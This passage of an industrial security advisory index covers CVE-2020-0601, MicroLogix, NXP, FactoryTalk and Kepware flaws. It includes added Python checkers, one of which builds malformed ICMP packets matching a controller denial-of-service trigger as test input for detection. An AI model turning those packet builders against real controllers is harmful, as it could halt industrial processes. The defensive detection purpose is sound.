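# needs to inspect because any explicit block is rejected.
EXPLICIT_PARAMS_SPKI = build_ec_spki(der(SEQUENCE, der(INTEGER, b"\x01")), PLACEHOLDER_POINT)

if __name__ == "__main__":
    for label, spki in (("named curve", NAMED_CURVE_SPKI), ("explicit params", EXPLICIT_PARAMS_SPKI)):
        print(f"{label:16} -> {classify_ec_spki(spki)}")
```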

Risk Mitigation & User Action

Customers should understand their potential exposure to this vulnerability by completing a thorough asset inventory and assessment.

Vulnerability: CVE-2020-0601
Rockwell Automation Product:
  • CompactLogix 5480 Controllers
  • ControlLogix Compute Module (1756-CMS1B1)
Suggested Actions: Microsoft released a patch for affected versions of Windows on January 14, 2020. Patch via Windows Update Service or normal patching process.

Vulnerability: CVE-2020-0601
Rockwell Automation Product:
  • FactoryTalk Analytics LogixAI
Suggested Actions: Install the Microsoft Cumulative Security Updates on FactoryTalk Analytics LogixAI; refer to QA58887.

Otherwise, Rockwell Automation will provide a firmware update for the products noted. Patches are not yet available for these products. When the patches are available, this article will be updated.

Vulnerability: CVE-2020-0601
Rockwell Automation Product:
  • FactoryTalk Analytics for Devices
Suggested Actions: To reduce risk, customers should ensure they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. Refer to the Deploying a Resilient Converged Plantwide Ethernet Architecture Design and Implementation Guide.

Customers using Rockwell Automation industrial compute solutions, such as VersaView computers, Industrial Data Centers, etc., are recommended to regularly inventory and patch their host operating systems.

Update on 1/31/2020: Rockwell Automation MS Patch Qualification team successfully qualified the Microsoft patch related to Curveball. Full results and other useful information can be found here.

General Security Guidelines

  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that communications from unauthorized sources are blocked.
  • Use trusted software, software patches, antivirus/antimalware programs, and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865.
  • Locate control system networks and devices behind firewalls, and isolate them from the business network.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

  • CVE-2020-0601 Windows CryptoAPI Spoofing Vulnerability
  • Microsoft Windows CryptoAPI fails to properly validate ECC certificate chains
  • Patch Critical Cryptographic Vulnerability in Microsoft Windows Clients and Servers

High
PN1548 | PN1548 | Allen-Bradley MicroLogix 1100 Programmable Logic Controller IPv4 Denial-of-Service Vulnerability
Published Date:
January 19, 2021
Last Updated:
January 19, 2021
CVE IDs:
CVE-2020-6111
Products:
1763 MicroLogix 1100
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number: 1.0
Version 1.0 - January 19, 2021. Initial Release.

Executive Summary

Rockwell Automation received a report from the Cisco® Talos™ team regarding a vulnerability in the Allen-Bradley® MicroLogix™ 1100 controller. If successfully exploited, this vulnerability may result in denial-of-service conditions.

Customers using affected versions of this controller are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

MicroLogix 1100, all versions.

Vulnerability Details

CVE-2020-6111: Improper Processing of IPv4 Packets May Result in Denial-of-Service Conditions
A vulnerability exists with the processing of ICMP packets with an invalid IPv4 length in the MicroLogix 1100. This vulnerability could allow a remote, unauthenticated attacker to send malformed packets and cause the controller to enter 8H Hard Fault. This event would lead to denial-of-service conditions. To recover from the condition, the controller must be power cycled and the project redownloaded.

CVSS v3.1 Base Score: 7.5/10 [HIGH]
CVSS v3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
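The advisory only says the controller faults on ICMP packets with an "invalid IPv4 length", so a monitor or firewall in front of a MicroLogix 1100 that cannot be migrated needs a rule for what "invalid" means. The checker below is an added example, not Rockwell Automation or Cisco Talos code; it assumes the defect is an inconsistency between the IPv4 header's IHL and total-length fields and the bytes actually received, and flags any packet where those fields disagree. The sample packets are constructed in the block purely as checker input.

```python
"""Flag IPv4 packets whose header length fields disagree with what arrived.

Added example for the CVE-2020-6111 entry; not vendor code. The rule: the
IPv4 total length must be at least the header length (IHL) and at most the
bytes on the wire (extra trailing bytes are tolerated because Ethernet pads
short frames), and IHL must cover the 20-byte minimum header.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

IPPROTO_ICMP = 1
IPV4_MIN_HEADER = 20


@dataclass
class Verdict:
    ok: bool
    reason: str
    protocol: Optional[int] = None


def check_ipv4_lengths(packet: bytes) -> Verdict:
    """Check that an IPv4 packet's IHL and total-length fields are self-consistent.

    `packet` is the IP layer of one frame (Ethernet header already removed).
    """
    if len(packet) < IPV4_MIN_HEADER:
        return Verdict(False, "truncated: fewer than 20 bytes")
    version = packet[0] >> 4
    ihl_bytes = (packet[0] & 0x0F) * 4
    total_length = struct.unpack("!H", packet[2:4])[0]
    protocol = packet[9]
    if version != 4:
        return Verdict(False, f"not IPv4 (version={version})", protocol)
    if ihl_bytes < IPV4_MIN_HEADER:
        return Verdict(False, f"IHL {ihl_bytes} below 20-byte minimum", protocol)
    if ihl_bytes > len(packet):
        return Verdict(False, f"IHL {ihl_bytes} extends past end of packet", protocol)
    if total_length < ihl_bytes:
        return Verdict(False, f"total length {total_length} < header length {ihl_bytes}", protocol)
    if total_length > len(packet):
        return Verdict(False, f"total length {total_length} > {len(packet)} bytes received", protocol)
    return Verdict(True, "consistent", protocol)


def scan(packets: List[bytes]) -> List[Tuple[int, str]]:
    """Return (index, reason) for every packet that fails the length check."""
    results = [(i, check_ipv4_lengths(p)) for i, p in enumerate(packets)]
    return [(i, v.reason) for i, v in results if not v.ok]


def build_ipv4_icmp_echo(total_length: int, ihl_words: int = 5, payload: bytes = b"") -> bytes:
    """Build an IPv4 echo request with caller-chosen length fields (checker input only).

    Addresses are RFC 5737 documentation addresses; the header checksum is left
    at zero because check_ipv4_lengths() does not verify it.
    """
    header = struct.pack(
        "!BBHHHBBH4s4s",
        (4 << 4) | ihl_words,    # version 4, IHL in 32-bit words
        0,                       # DSCP / ECN
        total_length,            # what the header claims the packet length is
        0x1234,                  # identification
        0,                       # flags / fragment offset
        64,                      # TTL
        IPPROTO_ICMP,
        0,                       # header checksum (not checked here)
        bytes([192, 0, 2, 10]),  # source
        bytes([192, 0, 2, 20]),  # destination (the controller)
    )
    icmp_echo = struct.pack("!BBHHH", 8, 0, 0, 1, 1)  # type 8, code 0, csum, id, seq
    return header + icmp_echo + payload


# Constructed samples, each 28 bytes on the wire (20-byte header + 8-byte ICMP echo).
SAMPLES = {
    "well-formed": build_ipv4_icmp_echo(total_length=28),
    "total length overstated": build_ipv4_icmp_echo(total_length=1500),
    "total length shorter than header": build_ipv4_icmp_echo(total_length=8),
    "IHL below minimum": build_ipv4_icmp_echo(total_length=28, ihl_words=2),
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        v = check_ipv4_lengths(pkt)
        print(f"{name:34} -> {'OK ' if v.ok else 'BAD'} {v.reason}")
```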

Risk Mitigation & User Action

Customers using the affected controllers are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.
Vulnerability Suggested Actions
CVE-2020-6111 Migrate to MicroLogix 1400 and apply firmware v21.006 or later.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources is blocked.
  • Consult the product documentation for specific features, such as a hardware key mode setting, which may be used to block unauthorized changes.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article ID BF7490.
General Mitigations
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the KnowledgeBase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • CVE-2020-6111

Medium
PN1542 | PN1542 | Side-Channel Issue on NXP 7x Secure Authentication Microcontrollers May Lead to ECC Key Extraction
Published Date:
January 14, 2021
Last Updated:
January 14, 2021
CVE IDs:
CVE-2021-3011
Products:
5069-L330ERMS2K, 5069-L340ERMS2, PowerFlex 6000, 5069-L3100ERS2, PowerFlex 755, 5069-L3100ERMS2, 5069-L306ERMS2, 2198 Kinetix 5700 Drive, iTRAK, 5069-L350ERMS2K, 5069-L320ERMS2K, 5069-L320ERMS2, 5069-L330ERS2K, 5069-L330ERMS2, 5069-L320ERS2K, 5069-L350ERS2K, 5069 Compact GuardLogix 5380, 5069-L380ERMS2, PowerFlex 755T, 1756 ControlLogix, 5069-L350ERMS2, 5069-L380ERS2
CVSS Scores:
4.9
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number: 1.0
Version 1.0 - January 14, 2021. Initial Release.

Executive Summary

A report has been released regarding a vulnerability in the NXP 7x series microcontroller. If successfully exploited, this vulnerability may result in the extraction of a unique private key. This unique key is used to verify the authenticity of the affected Rockwell Automation® products.

Customers using affected products are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • 1756-EN2T
  • 1756-EN4T
  • 1756-EN4TR
  • ControlLogix® 5580 Series
    • 1756-L81EK, -L82EK, -L83EK, -L84EK, -L85EK
    • 1756-L81EP, -L83EP, -L85EP
    • 1756-L81E-NSE, 1756-L82E-NSE, 1756-L83E-NSE, 1756-L84E-NSE, 1756-L85E-NSE
    • 1756-L81EXT, 1756-L82EXT, 1756-L83EXT, 1756-L84EXT, 1756-L85EXT
  • GuardLogix 5580 Series
    • 1756-L81ES, -L82ES, -L83ES, -L84ES, -L8SP
    • 1756-L81ESK, -L82ESK, -L83ESK, -L84ESK, -L8SPK
  • Compact GuardLogix® 5380 Series
    • 5069-L306ERMS2
    • 5069-L306ERMS3
    • 5069-L306ERS2
    • 5069-L3100ERMS2
    • 5069-L3100ERMS3
    • 5069-L3100ERS2
    • 5069-L310ERMS2
    • 5069-L310ERMS3
    • 5069-L310ERS2
    • 5069-L320ERMS2
    • 5069-L320ERMS2K
    • 5069-L320ERMS3
    • 5069-L320ERMS3K
    • 5069-L320ERS2
    • 5069-L320ERS2K
    • 5069-L330ERMS2
    • 5069-L330ERMS2K
    • 5069-L330ERMS3
    • 5069-L330ERMS3K
    • 5069-L330ERS2
    • 5069-L330ERS2K
    • 5069-L340ERMS2
    • 5069-L340ERMS3
    • 5069-L340ERS2
    • 5069-L350ERMS2
    • 5069-L350ERMS2K
    • 5069-L350ERMS3
    • 5069-L350ERMS3K
    • 5069-L350ERS2
    • 5069-L350ERS2K
    • 5069-L380ERMS2
    • 5069-L380ERMS3
    • 5069-L380ERS2
  • CompactLogix™ 5380 Series
    • 5069-L306ER
    • 5069-L306ERM
    • 5069-L310ER
    • 5069-L310ER-NSE
    • 5069-L310ERM
    • 5069-L320ER
    • 5069-L320ERM
    • 5069-L320ERMK
    • 5069-L320ERP
    • 5069-L330ER
    • 5069-L330ERM
    • 5069-L330ERMK
    • 5069-L340ER
    • 5069-L340ERM
    • 5069-L340ERP
    • 5069-L350ERM
    • 5069-L350ERMK
    • 5069-L380ERM
    • 5069-L3100ERM
  • 5069-AEN2TR
  • CompactLogix™ 5480 Series
    • 5069-L4100ERMW
    • 5069-L4200ERMW
    • 5069-L430ERMW
    • 5069-L450ERMW
    • 5069-L46ERMW
  • iTRAK® 5730 Small Frame
  • iTRAK 5750C
  • Kinetix® 5700 Series B - DAI, HPI, LFI, AFE
  • PowerFlex® 6000T
  • PowerFlex 755 TL
  • PowerFlex 755 TM
  • PowerFlex 755 TR

Vulnerability Details

CVE-2021-3011: Side-Channel Leakage of Unique ECC Private Key on NXP 7X Series Chip
The NXP A700X chip contains a vulnerability that may allow an attacker to physically extract ECC private keys. Expertise and specialized equipment are required to successfully open the package, extract, and process the side-channel leakage. Successful exploit of this vulnerability may allow an attacker to obtain the unique ECC private key for that chip only. The chip will also be physically damaged. For controllers, this unique key is currently used only during the initial deployment of CIP Security.

CVSS v3.1 Base Score: 4.9/10 [MEDIUM]
CVSS v3.1 Vector: CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

Risk Mitigation & User Action

Rockwell Automation encourages customers, when possible, to follow industry best practices for physical access including, but not limited to:
  • Limiting physical access to authorized personnel: control room, cells/areas, control panels, and devices.
  • Providing training and communication to personnel to raise awareness of threats.
  • Implementing physical barriers such as locked cabinets.

Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

General Security Guidelines

General Mitigations
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • CVE-2021-3011

High
PN1541 | PN1541 | FactoryTalk AssetCentre affected by M and M Software fdtCONTAINER Remote Code Execution Vulnerability
Published Date:
January 11, 2021
Last Updated:
January 11, 2021
CVE IDs:
CVE-2020-12525
Products:
FactoryTalk AssetCentre
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number: 1.0
Version 1.0 - January 11, 2021. Initial Version.

Executive Summary

Rockwell Automation received a report from M&M Software regarding vulnerabilities in the fdtCONTAINER component. fdtCONTAINER is distributed as part of FactoryTalk® AssetCentre software. If successfully exploited, this vulnerability may result in remote code execution.

This vulnerability does not impact FactoryTalk AssetCentre users who have not purchased the Process Device Configuration (SKU: 9515-ASTPRD*) capability or Calibration Management capability (SKU: 9515-ASTCAL*).

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk AssetCentre v9.00.00 and below with Process Device Configuration or Calibration Management capability.

Vulnerability Details

CVE-2020-12525: Deserialization of Untrusted Data May Result in Remote Code Execution
A deserialization vulnerability exists in the fdtCONTAINER component in FactoryTalk AssetCentre. This vulnerability could be exploited via a phishing attack in which an attacker sends a specially crafted project file to a local user. When the malicious project file is opened by the local user, it may execute malicious code with the user rights of FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 8.6/10 [HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected versions of FactoryTalk AssetCentre are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Suggested Actions
CVE-2020-12525 Deny access to PDC Field Edition. To do this, follow the steps below.

To deny access to PDC Field Edition:
  1. Open FactoryTalk Admin Console
  2. Select “System”
  3. Select “Policies”
  4. Select “FactoryTalk AssetCentre”
  5. Open “Feature Security Properties”
  6. Locate “Run PDC Field Edition” under “Process Device Configuration Policies” and select the ellipses (…) next to “Configure Security”.
  7. Select the “Deny” Checkboxes for “Administrators” and “All Users”
  8. Select “OK”
  9. Select “Apply”

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources is blocked.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article ID 898270.

Software/PC-based Mitigation Strategies
  • Do not use standalone PDC Field Edition
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use Microsoft® AppLocker or another similar allow list application to help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID 546989.
  • Confirm that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

Social Engineering Mitigation Strategies
  • Do not open untrusted files with FactoryTalk AssetCentre.
  • Do not click or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

Critical
PN1539 | PN1539 | Vulnerabilities in the Kepware OPC UA server interface may lead to Denial-of-Service Conditions or Data Leak
Published Date:
December 17, 2020
Last Updated:
December 17, 2020
CVE IDs:
CVE-2020-27267, CVE-2020-27263
Products:
ThingWorx Industrial Connectivity, ThingWorx, Kepserver Enterprise
CVSS Scores:
7.5, 9.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - December 17, 2020. Initial Release.

Executive Summary

Rockwell Automation received a report from PTC, a strategic partner of Rockwell Automation, regarding vulnerabilities in the Kepware OPC UA server interface for KEPServer Enterprise, ThingWorx® Kepware Server, and ThingWorx Industrial Connectivity. If successfully exploited, these vulnerabilities may result in the product ceasing to function. This may cause the following impacts: a loss of ability to configure the application, a loss of data, a loss of data acquisition, or a loss of communication with control system assets.

Customers using affected versions of this server are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

KEPServer Enterprise, versions 6.6.504.0; 6.9.572.0
ThingWorx Industrial Connectivity, all versions
ThingWorx Kepware Server, all versions

Vulnerability Details


CVE-2020-27263: Heap-based Buffer Overflow
The affected products are vulnerable to a heap-based buffer overflow. Opening a specifically crafted OPC message could allow a remote attacker to crash the server and potentially leak data.

CVSS v3.1 Base Score: 9.1 [Critical]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H


CVE-2020-27267: Use After Free
The affected products contain a use-after-free vulnerability, which may allow an attacker who creates and closes OPC UA connections at a high rate to crash the server. Successful exploitation of this vulnerability may result in denial-of-service conditions.

CVSS v3.1 Base Score: 7.5 [High]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available firmware revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these options with the general security guidelines to employ multiple strategies simultaneously.

PTC recommends that users upgrade to the most current supported version.
Recommended User Actions (by base version)
Affected Product | 6.6 | 6.7 | 6.8 | 6.9
KEPServer Enterprise (Download) | Apply version 6.6.550.0 | -- | -- | Apply version 6.9.584.0
ThingWorx Kepware Server (Download) | -- | -- | Apply version 6.8.839.0 | Apply version 8.9.584.0
ThingWorx Industrial Connectivity (Download) | Apply version 8.4 (6.6.362.0) | Apply version 8.5 (6.7.1068) | -- | --

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources is blocked.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.


For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).



ADDITIONAL LINKS
  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • https://us-cert.cisa.gov/ics/advisories/icsa-20-352-02

Critical
PN1536 | PN1536 | FactoryTalk® Linx® Affected by Multiple Denial-of-Service and Heap Overflow Vulnerabilities
Published Date:
November 24, 2020
Last Updated:
November 24, 2020
CVE IDs:
CVE-2020-27251, CVE-2020-27255, CVE-2020-27253
Products:
FactoryTalk Linx Gateway
CVSS Scores:
8.6, 9.8, 5.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - November 24, 2020. Initial Release.

Executive Summary

Rockwell Automation PSIRT received a report from Claroty, an industrial security product vendor and research company, regarding three vulnerabilities in FactoryTalk® Linx software. If successfully exploited, these vulnerabilities may result in denial-of-service conditions, control of the execution flow, or information disclosure. If the vulnerabilities are chained together, it may be possible to achieve remote code execution.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Special thanks to Claroty for discovering this vulnerability.

Affected Products

FactoryTalk Linx v6.11 and earlier.

Vulnerability Details

CVE-2020-27251: Remote Code Execution due to Heap Overflow
A heap overflow vulnerability exists within FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to send malicious port ranges, which could result in remote code execution.

CVSS v3.1 Base Score: 9.8/10 [Critical]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2020-27253: Denial-of-service due to a flaw in Ingress/Egress checks routine
A flaw exists in the Ingress/Egress checks routine of FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to craft a malicious packet that results in a denial-of-service condition on the device.

CVSS v3.1 Base Score: 8.6/10 [High]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVE-2020-27255: Information Disclosure and ASLR bypass due to Heap Overflow
A heap overflow vulnerability exists within FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to send malicious set attribute requests, which could result in leaking sensitive information. This information disclosure could lead to the bypass of Address Space Layout Randomization (ASLR).

CVSS v3.1 Base Score: 5.3/10 [Medium]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N



Risk Mitigation & User Action


Customers using the affected versions of FactoryTalk Linx are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Details | Recommended User Actions
CVE-2020-27253, CVE-2020-27251, CVE-2020-27255 | For FactoryTalk Linx v6.10 and v6.11, see Patch Answer ID BF25509

Additionally, the user could move to v6.20 which is available on the PCDC

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or another similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation® products is available at Knowledgebase Article ID QA17329.
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.
General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • https://us-cert.cisa.gov/ics/advisories/icsa-20-329-01

PN1534 | PN1534 | Stratix 5700 HTTP Session Management Weakness
Published Date:
October 30, 2020
Last Updated:
October 30, 2020
Products:
Stratix 5700 Managed Switch
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - October 30, 2020. Initial Release.

Executive Summary

